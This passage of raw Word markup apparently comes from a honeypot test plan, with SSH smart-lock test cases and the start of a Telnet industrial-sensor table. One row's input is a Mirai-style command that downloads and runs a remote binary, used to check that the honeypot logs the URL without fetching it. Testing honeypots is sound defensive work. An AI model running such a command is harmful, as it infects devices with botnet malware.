                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the shell reads the shared device state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/lock_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/lock_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Current lock state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">locked (value from Redis device:smartlock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify exec channel commands are served and logged (30% defect)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh admin@host -p 2222 'cat /proc/cpuinfo | head -2'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / admin + exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Command output returned without a shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">processor : 0 … returned; command event stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SSH-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify download URLs are captured but never fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">cd /tmp; wget http://198.51.100.23/arm7 -O .x; chmod 777 .x; ./.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Mirai-style chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">download_attempt event; no outbound request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">download_attempt stored; URL listed as IOC; no connection made</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9038" w:name="_Toc69038"/>
      <w:r>
        <w:t xml:space="preserve">Telnet Honeypot (Industrial Sensor)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9038"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the Telnet honeypot emulating the Industrial Sensor on port 2323.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for the Telnet Industrial Sensor</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
